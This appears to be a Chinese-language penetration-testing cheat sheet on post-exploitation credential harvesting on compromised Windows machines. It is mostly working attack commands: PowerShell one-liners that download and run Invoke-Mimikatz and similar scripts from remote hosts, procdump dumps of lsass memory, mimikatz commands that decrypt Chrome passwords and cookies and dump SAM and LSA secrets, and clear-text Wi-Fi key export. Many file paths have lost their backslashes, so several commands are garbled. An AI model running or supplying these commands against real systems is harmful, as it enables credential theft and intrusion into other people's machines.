系統提權總結

1.1系統管理員密碼

A.常用來獲取windows密碼的工具

1.mimikatz

2.wce

3.getpass

4.QuarksPwDump

5.reg-sam

6.pwdump7

7.procdump.exe +mimikatz.

B.免殺抓取密碼的兩種方式

1.powershell "IEX (New-Object Net.WebClient).DownloadString(is.gd/oeoFuI);Invoke-Mimikatz -DumpCreds"

tips:powershell 默認windows visa後才有

2. procdump lsass 進程導出技巧

C: empprocdump.exe -accepteula -ma lsass.exelsass.dmp //For 32 bits

C: empprocdump.exe -accepteula -64 -ma lsass.exelsass.dmp //For 64 bits

然後本地使用mimikatz 還原密碼

1.2 其他用戶session、3389和ipc連接記錄、各用戶回收站信息收集

C.windows本地的信息收集、回收站的信息獲取

cmdkey /list

查看3389可信任鏈接

使用netpass.exe 即可知道密碼

net use

查看到已建立連接記錄。也是直接可以

用wmic at sc 等直接執行命令的

其中$I開頭的文件保存的是路徑信息,$R保存的是文件

FOR /f "skip=1 tokens=1,2 delims= " %c in (wmicuseraccount get name^,sid)do dir /a /b C:$Recycle.Bin\%d ^>%c.txt

$Recycler =(New-Object -ComObject Shell.Application).NameSpace(0xa);foreach($file in $Recycler.items()){$file.path;$file.ExtendedProperty("{9B174B33-40FF-11D2-A27E-00C04FC30871}2")++$file.name;$file.Type}

1.3 瀏覽器密碼和瀏覽器cookies的獲取 ie chromefirefox 等

D1.chrome為例 的密碼和cookies獲取

%localappdata%googlechromeUSERDA~1defaultLOGIND~1

%localappdata%googlechromeUSERDA~1defaultUSERDA~1

%localappdata%googlechromeUSERDA~1defaultcookies

chrome的用戶信息保存在本地文件為sqlite 資料庫格式

D2.mimikatz+WebBrowserPassView.exe獲取瀏覽器的密碼和cookie信息

mimikatz 讀取chrome cookies

mimikatz.exe privilege::debug log "dpapi::chrome/in:%localappdata%googlechromeUSERDA~1defaultcookies /unprotect" exit

mimikatz.exe privilege::debug log "dpapi::chrome/in:%localappdata%googlechromeUSERDA~1defaultUSERDA~1" exit

mimikatz.exe privilege::debug log "dpapi::chrome/in:%localappdata%googlechromeUSERDA~1defaultLOGIND~1" exit //讀chrome密碼

1.4 windows無線密碼獲取。資料庫密碼獲取

E.windows wifi密碼的獲取

netsh wlanexport profile interface=無線網路連接 key=clearfolder=C:

1.5 host文件獲取和dns緩存信息收集 等等

F.windowshosts/iis config

C:WindowsSystem32driversetchosts

windows7 windows2008等

C:WINDOWSSYSTEM32DRIVERSETCHOSTS

windows2003位置

提權情況下或者過了uac的情況下直接type一下就行了

iis-web路徑

iis6 =========>cscript.exe C:InetpubAdminScriptsadsutil.vbs ENUMW3SVC/1/root

iis7 ,8 =======>appcmd.exe

%systemroot%/system32/inetsrv/appcmd.exe list site ——列出網站列表

%systemroot%system32inetsrvappcmd.exe list vdir ——列出網站物理路徑

當然你也可以用mimikatz

mimiktaz 讀取iis7配置文件密碼

mimikatz.exe privilege::debug log "iis::apphost/in:"%systemroot%system32inetsrvconfigapplicationHost.config"/live" exit

1.6 殺軟 補丁 進程 網路代理信息wpad信息。軟體列表信息

G.ie瀏覽器的代理信息查看(網路代理信息wpad信息)

reg query "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternetSettings"

1.7 計劃任務 賬號密碼策略與鎖定策略 共享文件夾 web伺服器配置文件

H.windows logview

1.Windows2003下默認存在eventquery.vbs

cscript c:WINDOWSsystem32eventquery.vbs /fi "Datetimeeq 06/24/2015,01:00:00AM-06/24/2015,10:00:00AM" /l Security /V #查看SECURITY日誌 2015-6.24 上午1-上午10點日誌

windows 7以上wevtutil 命令

2.查詢所有登錄、註銷相關的日誌語法

wevtutil qe security /rd:true /f:text /q:"*[system/eventid=4624and 4623 and 4627]" #

3.第三方信息收集工具LogParser.exepsloglist.exe等

1.8 vpn歷史密碼等 teamview密碼等 啟動項 iislog 等等

I.vpn密碼獲取為例

mimikatz.exeprivilege::debug token::elevate lsadump::sam lsadump::secrets exit

其他工具如Dialupass.exe

感興趣可以看看mimikatz dpapi模塊的使用。很強大 sam 密碼 ipc連接密碼

1.9 常用的後滲透信息收集工具。powershell+passrec的使用

J1.passrec intro

include:

vnc

mail

vpn

router

ie firefox chrome

J2.powshellintro

FTP訪問、共享連接、putty連接 驅動、應用程序、hosts 文件、進程、無線網路記錄

powershell "IEX (New-ObjectNet.WebClient).DownloadString(

github.com/samratashok/);Get-Information"

正則過濾進程密碼,已測windows7

powershell IEX (New-Object System.Net.Webclient).DownloadString(raw.githubusercontent.com); Invoke-mimikittenz

sqlserver密碼獲取工具Get-MSSQLCredentialPasswords.psm1 //未測


推薦閱讀:

TAG:網路滲透 | Web安全測試 | 滲透測試 |